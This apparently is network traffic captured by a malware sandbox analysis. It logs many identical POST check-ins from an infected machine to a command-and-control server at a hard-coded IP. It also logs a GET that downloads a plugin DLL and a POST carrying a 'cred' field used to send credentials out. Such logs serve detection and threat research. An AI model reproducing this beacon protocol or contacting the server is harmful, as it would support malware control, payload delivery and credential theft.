                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/scr.dll HTTP/1.1Host: 176.111.174.114
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST //Hnq8vS/index.php HTTP/1.1Host: 176.111.174.114Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 63 72 65 64 3d Data Ascii: id=152138533219&cred=
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
